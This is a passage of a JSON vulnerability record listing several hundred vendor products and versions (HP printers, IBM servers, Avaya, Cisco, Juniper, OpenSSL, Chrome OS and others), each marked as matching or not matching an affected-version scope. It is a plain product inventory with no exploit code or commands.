analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77109.7" }, { "model": "laserjet pro m401a/d/dn/dnw/dw/n cf399a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "40020150212" }, { "model": "color laserjet cp3525 cc469a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "6.183.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "quantum policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "laserjet enterprise color m775 series cc522a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7000" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "msr20 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "forticlient", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.0.614" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "asset manager 9.41.p1", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.6" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.57" }, { "model": "msr1000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.88" }, { "model": "proxysgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.3" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "utm manager", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "4.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.51" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.9" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3" }, { "model": "cloud server", "scope": "eq", "trust": 0.3, "vendor": "parallels", "version": "6.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.16" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "system x3630m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73771.42" }, { "model": "workstation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "10.0.2" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "bladesystem c-class onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.22" }, { "model": "fortirecorder", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "1.4.1" }, { "model": "enterprise linux long life 5.9.server", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "powerlinux 7r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vcenter chargeback manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.6" }, { "model": "network connect", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.1.0.18193" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.0" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "color laserjet cp6015 q3931a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.203.1" }, { "model": "system dx360m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73211.42" }, { "model": "telepresence mxp series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.2" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.123" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "jetdirect ew2500 802.11b/g wireless print server j8021a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "41.16" }, { "model": "cit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.53" }, { "model": "color laserjet cm4730 multifunction printer cb483a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "50.286.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1" }, { "model": "junos r2-s2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.12" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7900.00" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.50" }, { "model": "project metasploit framework", "scope": "eq", "trust": 0.3, "vendor": "metasploit", "version": "4.9.1" }, { "model": "client connector", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.0" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.4" }, { "model": "integrated management module ii", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.91" }, { "model": "laserjet enterprise m4555 mfp ce738a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos os 12.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "color laserjet cm4730 multifunction printer cb480a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "50.286.1" }, { "model": "flare experience for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.2.2" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.1.4" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "communicator for ipad", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "lifetime key management appliance", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "bladesystem c-class onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.20" }, { "model": "vix api", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.12" }, { "model": "srg1200\u00262200\u00263200 v100r002c02spc800", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "ei switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51200" }, { "model": "color laserjet cm4730 multifunction printer cb481a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "50.286.1" }, { "model": "laserjet pro m401a/d/dn/dnw/dw/n cf270a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "40020150212" }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "laserjet enterprise color m855 a2w78a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8000" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.15" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2" }, { "model": "strm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.26" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "cc v200r001c31", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "junos 13.2r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 11.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s12700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.10" }, { "model": "websphere datapower xml accelerator xa35", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0" }, { "model": "laserjet enterprise color m775 series cc523a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7000" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.0.10648" }, { "model": "laserjet p4014 cb507a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "xenmobile app controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "2.9" }, { "model": "database and middleware automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.10" }, { "model": "oceanstor s5500t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "8.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.6" }, { "model": "netscaler build", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "8.047.8" }, { "model": "enterprise linux server eus 6.4.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "vcd", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.11" }, { "model": "security information and event management hf3", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.1.4" }, { "model": "laserjet enterprise color m551 series cf083a 2302963 436083", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "500" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.2" }, { "model": "documentum content server sp2 p13", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "icewall sso dfw r2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.5" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "laserjet p2055 printer series ce456a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "20141201" }, { "model": "messaging secure gateway", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.1" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.01" }, { "model": "9250c digital sender cb472a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "netiq admininstration console server", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "0" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1.131" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "s2750\u0026s5700\u0026s6700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "sparc m10-4", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "junos 13.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "software foundation python", "scope": "eq", "trust": 0.3, "vendor": "python", "version": "3.5" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7100" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "laserjet enterprise color m855 a2w79a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8000" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "10.0-76.7" }, { "model": "bbm for iphone", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.4" }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "documentum content server sp2 p14", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "color laserjet cp6015 q3934a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system enterprise chassis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8721" }, { "model": "color laserjet m651 cz257a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "director", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.0" }, { "model": "laserjet enterprise m4555 mfp ce502a 2302963 436064", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "vsphere virtual disk development kit", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "ive os 8.0r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "system storage ts2900 tape librray", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "0033" }, { "model": "laserjet enterprise m4555 mfp ce504a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "laserjet cm3530 multifunction printer cc519a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.9" }, { "model": "ecns600 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "10.0-77.5" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.3" }, { "model": "laserjet p3005 printer series q7816a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "2.190.3" }, { "model": "jabber voice for iphone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.6" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos os 12.1x46-d25", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "laserjet p4515 cb516a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.172" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "aura application server sip core pb19", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "bladecenter js22", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7998-61x)0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.15" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.65" }, { "model": "executive scorecard", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.41" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.5" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "4.3.6" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.4" }, { "model": "junos 12.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uacos c5.0", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "strm/jsa", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "junos 12.3r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "z/tpf", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.10" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.40" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "laserjet enterprise color mfp m880 d7p70a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8000" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "laserjet p4515 cb514a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "puredata system for operational analytics a1791", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "dsm v100r002c05spc615", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.55" }, { "model": "system x3400m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "78361.42" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "fortirecorder", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "1.5" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos insight standalone fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "vdi communicator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "bladecenter js23", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x)0" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.1.5" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "msa storage gl200r007", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "2040" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "icewall sso certd r3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "command view server based management", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.3.2" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "laserjet printer series q7697a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9040/90508.260.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.161" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.5" }, { "model": "paging server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.0.6" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.5" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9500e family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "ace application control engine module ace20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "laserjet enterprise m712 series cf235a 2302963 436080", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "700" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "fortisandbox build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "1.3.086" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.4" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.94" }, { "model": "agent desktop for cisco unified contact center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0.31" }, { "model": "dgs-1210-28p", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "4.00.043" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.75" }, { "model": "color laserjet m680 cz248a 2302963 436072", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.91" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "ape", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "hyperdp v200r001c91spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x330073820" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.40" }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dsr-500 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.3-64.4" }, { "model": "s3900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.19" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "enterprise linux server eus 6.3.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0" }, { "model": "junos 